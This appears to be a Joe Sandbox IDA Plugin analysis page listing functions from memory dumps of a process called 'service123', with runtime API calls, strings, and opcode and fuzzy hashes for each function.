Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 613ecbfc6c8931a383a395ca9e6fe666519da7093d5ee003930705519ce464bb
Instruction ID: ab119b3f6a1233e27c6d6a01d09f2af0207bd8449565af50319722cd9cd7b65e
Opcode Fuzzy Hash: 613ecbfc6c8931a383a395ca9e6fe666519da7093d5ee003930705519ce464bb
Instruction Fuzzy Hash: 3A513AB2A493099FC700EF29C48565AFBF4BF85318F55891CE99887A50D734E84ACF92

Function 6C2FE0A0 Relevance: 16.6, APIs: 11, Instructions: 98COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bfb0bfcd2bbb98b3a27f3bdf0869197f06fb3f1bd837e748534f8eb9b0f68795
Instruction ID: c4e10b82b5c5ddb9697010f7e680f244c07e55cdfccefe095d5ea543084aa43e
Opcode Fuzzy Hash: bfb0bfcd2bbb98b3a27f3bdf0869197f06fb3f1bd837e748534f8eb9b0f68795
Instruction Fuzzy Hash: B8213B3238520D8BC704CF1CD881997B3A6EBC632872C817EE9588BB15D637A807C790

Function 6C2FE570 Relevance: 15.1, APIs: 10, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction ID: 6fc856638dd0683ad576a952b3630adc1962a4535a0ea37a2bd8e2da138b98d7
Opcode Fuzzy Hash: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction Fuzzy Hash: 0841937068830F8AD712DF29C04066AF7E6AF81319F544A19FCB487A95E734D94F8BD2

Function 6C2FE59B Relevance: 15.1, APIs: 10, Instructions: 89COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction ID: 2411e08aba4ac860a505739a7ad3259776cdab6d823a203c14aff5da458e85cb
Opcode Fuzzy Hash: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction Fuzzy Hash: 2421917058530F8AD712DE28C09066AF7E2AF41719F644A09FCB487A85E334D94F8BD2

Function 6C2FE714 Relevance: 15.0, APIs: 10, Instructions: 35COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction ID: 80b9e1899938fc49db9b90835448d9d6f8df9e8a7ad457ec76e04c85f198b6fd
Opcode Fuzzy Hash: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction Fuzzy Hash: 4AE04F715C821F8AC612DE28C061599F7969A46349B40480AECE597D14D720D98F8B87

Function 6C309249 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C309260
GetProcAddress.KERNEL32 ref: 6C30927A
LoadLibraryW.KERNEL32 ref: 6C30929F
GetProcAddress.KERNEL32 ref: 6C3092B3

Strings

rand_s, xrefs: 6C30926F
msvcrt.dll, xrefs: 6C309255
SystemFunction036, xrefs: 6C3092A8
advapi32.dll, xrefs: 6C309298

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 465caa53d8a1fdafedd740ce53fc3fed282a23ec7931b153af718f1e31f89a97
Instruction ID: 123457a7d8a7f074b246b1b7adbdc4799a86df5ce74ad53e87c70561f0792b04
Opcode Fuzzy Hash: 465caa53d8a1fdafedd740ce53fc3fed282a23ec7931b153af718f1e31f89a97
Instruction Fuzzy Hash: 66F04FB69453008BCB00FF79864721E7FB4BB06320F02092CD5C597600D334A414CF67

Function 6C38F8C0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36DA2E), ref: 6C38F95D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36DA2E), ref: 6C38F988
memmove.MSVCRT ref: 6C38F9D7
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36DA2E), ref: 6C38FA0D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C36DA2E), ref: 6C38FA58

Strings

basic_string::_M_replace, xrefs: 6C38FBB6

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 698e38b9a35f5966e9d11cf6b623a6d8feb0c392a7b867a78ef4538ce946dbb8
Instruction ID: 14b549df3a11d40fdcf9527c75c27d5eace8a586b23872da2feb7c3cdb18c7ce
Opcode Fuzzy Hash: 698e38b9a35f5966e9d11cf6b623a6d8feb0c392a7b867a78ef4538ce946dbb8
Instruction Fuzzy Hash: 1C812271A0A3519FC301DF2CC18051AFBE5AF8A648F24891EE4D597B25D236D888CFA2

Function 6C2FFEE0 Relevance: 13.7, APIs: 9, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C3000D2
WaitForSingleObject.KERNEL32 ref: 6C300117

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 11b6f81e12a51b5eab9411f090d68efcfd35506cf28ff73cb202f1a546328e67
Instruction ID: 0a3e6f1e055bc901a723c7a0e27456bf5e02e7120f4fd9294e008cdc5d913f45
Opcode Fuzzy Hash: 11b6f81e12a51b5eab9411f090d68efcfd35506cf28ff73cb202f1a546328e67
Instruction Fuzzy Hash: 21617F717493498FEB10EF69C5447ABBBF4AB46308F008619ECA987B80D771E546CF92

Function 6C2FE760 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction ID: 1e23401dbf50f75deef60743a99ab106f477d77a59a118b82ab8caddf4af4f09
Opcode Fuzzy Hash: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction Fuzzy Hash: D601E571A9821E8FC701DA18C490A9AF7E6AB85314F004D29FCA587B14D230ECCBC7C2

Function 00C12BF0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00C12CC1

Strings

0, xrefs: 00C1313E
o, xrefs: 00C130A8

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction ID: 32a5cdcfa21001b2902a847ac09cc54dbd08f472124e8e4eed8922ba96ae784b
Opcode Fuzzy Hash: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction Fuzzy Hash: ACF18575A042098FCB15CF68C4806DDFBF2BF8A360F198219D864AB391D734EE95DB90

Function 6C3032C0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C303391

Strings

0, xrefs: 6C30380E
o, xrefs: 6C303778

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction ID: 3374952c3401bf6b36a8b542e51004dadcaa56be5df56016d2bf9d6a518bde45
Opcode Fuzzy Hash: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction Fuzzy Hash: 23F18172B056098FCB41CF68C480B9DBBF2BF89364F198269D854AB791D734E945CF90

Function 00C114E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00C114F0
LoadLibraryA.KERNEL32 ref: 00C11506
GetProcAddress.KERNEL32 ref: 00C11525
GetProcAddress.KERNEL32 ref: 00C11537

Strings

__deregister_frame_info, xrefs: 00C1152C
libgcc_s_dw2-1.dll, xrefs: 00C114E9, 00C114FF
__register_frame_info, xrefs: 00C1151A

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 2cd1451017523625d1b7ae34a8f8b49a6e9695ce733b0ee2607302d3b74ac628
Instruction ID: 38145a16a75172dd249ed619588da21f674410ad86782154bd640d56f083a1d7
Opcode Fuzzy Hash: 2cd1451017523625d1b7ae34a8f8b49a6e9695ce733b0ee2607302d3b74ac628
Instruction Fuzzy Hash: 680121B18052049BC700BF79A94939D7FF4EB4B750F05852DD98A87201E7748894ABA3

Function 6C2F13E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6C2F13F0
LoadLibraryA.KERNEL32 ref: 6C2F1406
GetProcAddress.KERNEL32 ref: 6C2F1425
GetProcAddress.KERNEL32 ref: 6C2F1437

Strings

__deregister_frame_info, xrefs: 6C2F142C
__register_frame_info, xrefs: 6C2F141A
libgcc_s_dw2-1.dll, xrefs: 6C2F13E9, 6C2F13FF

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 1f1d3b186c83536037032549c5b0435e95243c54f8a0da032ea61119f7fde6ef
Instruction ID: 908642f68bccbaee27a0c12fcc7be83b79a1537e53d71558e1c33972f43a6b1e
Opcode Fuzzy Hash: 1f1d3b186c83536037032549c5b0435e95243c54f8a0da032ea61119f7fde6ef
Instruction Fuzzy Hash: 01019EB6A493189BC700BF78950725EFFF4AA46650F42482DDAD887A10D731D844CBA3

Function 6C3173C0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 237stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6C317411
strlen.MSVCRT ref: 6C31742B
strlen.MSVCRT ref: 6C31747B
strlen.MSVCRT ref: 6C3174D8
strlen.MSVCRT ref: 6C31752C

Strings

*, xrefs: 6C317660
basic_string::append, xrefs: 6C3176CA, 6C3176D6, 6C3176E2, 6C3176EE

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: 601b4dba533521dea35919938461b67076ac7bc4049a9410912ab7c2af21b146
Instruction ID: aeb8328038c71b10b037fab31f8658ce0b43a16c6b2f9ad7e725d7484e06b634
Opcode Fuzzy Hash: 601b4dba533521dea35919938461b67076ac7bc4049a9410912ab7c2af21b146
Instruction Fuzzy Hash: 78A13871A086018FDB00EF28C18469EBBF1BF46308F55896CD8989BB55DB35E849CF93

Function 6C393DD0 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C393E6F
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C32E9CE), ref: 6C393ED3
memmove.MSVCRT ref: 6C393F0B
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C32E9CE), ref: 6C393F7A

Strings

basic_string::_M_replace, xrefs: 6C3940FF

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: a9c35cf6a87b3018796a83cee51874fb424771564f2f347d91539db3ac240a1d
Instruction ID: 975d4739f7da7e295cc4d9231933be5ffe077995c2150c370941d94def5ac799
Opcode Fuzzy Hash: a9c35cf6a87b3018796a83cee51874fb424771564f2f347d91539db3ac240a1d
Instruction Fuzzy Hash: 6391F276A093518FC300DF28C48096AFBF1BF89748F15892DE5999B724E775E984CF82

Function 6C2FE800 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
